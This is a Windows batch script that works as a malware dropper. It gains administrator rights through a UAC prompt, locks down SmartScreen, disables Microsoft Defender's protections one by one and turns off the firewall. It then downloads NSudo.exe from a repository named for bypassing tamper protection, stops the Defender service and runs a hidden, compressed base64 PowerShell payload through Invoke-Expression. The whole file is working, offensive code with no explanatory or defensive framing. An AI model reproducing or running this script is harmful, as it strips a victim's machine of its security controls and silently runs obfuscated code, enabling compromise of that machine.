@echo off :: BatchGotAdmin ::------------------------------------- REM --> Check for permissions >nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" REM --> If error flag set, we do not have admin. if '%errorlevel%' NEQ '0' ( echo Requesting administrative privileges... goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs" set params = %*:"=" echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" del "%temp%\getadmin.vbs" exit /B :gotAdmin pushd "%CD%" CD /D "%~dp0" takeown /f "%systemroot%\System32\smartscreen.exe" /a icacls "%systemroot%\System32\smartscreen.exe" /reset taskkill /im smartscreen.exe /f icacls "%systemroot%\System32\smartscreen.exe" /inheritance:r /remove *S-1-5-32-544 *S-1-5-11 *S-1-5-32-545 *S-1-5-18 powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe"" powershell.exe -command "Set-MpPreference -EnableControlledFolderAccess Disabled" powershell.exe -command "Set-MpPreference -PUAProtection disable" powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true" powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true" powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true" powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true" powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true" powershell.exe -command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true" powershell.exe -command "Set-MpPreference -DisableArchiveScanning $true" powershell.exe -command "Set-MpPreference -DisableIntrusionPreventionSystem $true" powershell.exe -command "Set-MpPreference -DisableScriptScanning $true" powershell.exe -command "Set-MpPreference -SubmitSamplesConsent 2" powershell.exe -command "Set-MpPreference -MAPSReporting 0" powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force" powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6" powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6" powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6" powershell.exe -command "Set-MpPreference -ScanScheduleDay 8" powershell.exe -command "netsh advfirewall set allprofiles state off" cd %temp% powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe', '.\NSudo.exe') } NSudo.exe -U:T -ShowWindowMode:Hide sc stop WinDefend @echo off if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPbTttAEH33V4wsS9iKbTkXWhSExE1pkWiKCGofojw4m4FsWe9au+MkhubfOwanLYhWVZ+OvTtzzpnLBgKO4Nj3pudKXRSlsRT692g1qn4vXSjlRzMoq7mSAhzlxIAb4nu40HRFFr5IS1WuTpQyImzP1jFUUhNsWqxbfIgO/1vnzGJOeLNkWOx0qpZ3FcMv5fbrN+32pFH3jz2y9WPguOgxrpPP828oCCa1IyzSMVI6MeIeybUI4fSNu5PFwqJzo7yQqp4NhyyAlgPWxt7H8FbGM97UJXL4hLiI4u3AK2vICKPa0BtRRl7g0jOjNRsN97qDQdp930t7vW7a6w/2YjjIDrIIvoOpKNGVUocQlFzd9MTavDH33LgLzV3VAkN/XhP6MQwiDtxwILNfo0C5wjAoXxE98H3mBfU/8E1PJbHLFVruRePccFf6PeaMs6iz36jV02zWEG5OR956KRVCyAqJor8nR/DYOOm8tFrHwUNnP+7Gf273SOV3jtnGRmMEW+/WWFaUR132IlkXYdB8dTqswOYC2bjb0b1y9AHplAt14ZSXasZGPuZ6oTDirKQ723oBcS7vRdIMDpICiznac7yVWpI0GgIByTgvEPyvUvd7PiSa/1yZC4Snk1GlRRPpIClz52hpq2ZARwENhy/eWBYHdXqJ+o6WcbbpZ1nGMMgib+f8utIkC0yfttKUE7QrKdCln3LrlrlqRmjKuukgZDy359cxC4NNumt7FMXwU4T3j3ZTb58fK8bBJm7g1epNKLeUTBRiCckEhdELOHg3yLKtyEksH7c/AA==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();") else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPbTttAEH33V4wsS9iKbTkXWhSExE1pkWiKCGofojw4m4FsWe9au+MkhubfOwanLYhWVZ+OvTtzzpnLBgKO4Nj3pudKXRSlsRT692g1qn4vXSjlRzMoq7mSAhzlxIAb4nu40HRFFr5IS1WuTpQyImzP1jFUUhNsWqxbfIgO/1vnzGJOeLNkWOx0qpZ3FcMv5fbrN+32pFH3jz2y9WPguOgxrpPP828oCCa1IyzSMVI6MeIeybUI4fSNu5PFwqJzo7yQqp4NhyyAlgPWxt7H8FbGM97UJXL4hLiI4u3AK2vICKPa0BtRRl7g0jOjNRsN97qDQdp930t7vW7a6w/2YjjIDrIIvoOpKNGVUocQlFzd9MTavDH33LgLzV3VAkN/XhP6MQwiDtxwILNfo0C5wjAoXxE98H3mBfU/8E1PJbHLFVruRePccFf6PeaMs6iz36jV02zWEG5OR956KRVCyAqJor8nR/DYOOm8tFrHwUNnP+7Gf273SOV3jtnGRmMEW+/WWFaUR132IlkXYdB8dTqswOYC2bjb0b1y9AHplAt14ZSXasZGPuZ6oTDirKQ723oBcS7vRdIMDpICiznac7yVWpI0GgIByTgvEPyvUvd7PiSa/1yZC4Snk1GlRRPpIClz52hpq2ZARwENhy/eWBYHdXqJ+o6WcbbpZ1nGMMgib+f8utIkC0yfttKUE7QrKdCln3LrlrlqRmjKuukgZDy359cxC4NNumt7FMXwU4T3j3ZTb58fK8bBJm7g1epNKLeUTBRiCckEhdELOHg3yLKtyEksH7c/AA==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();")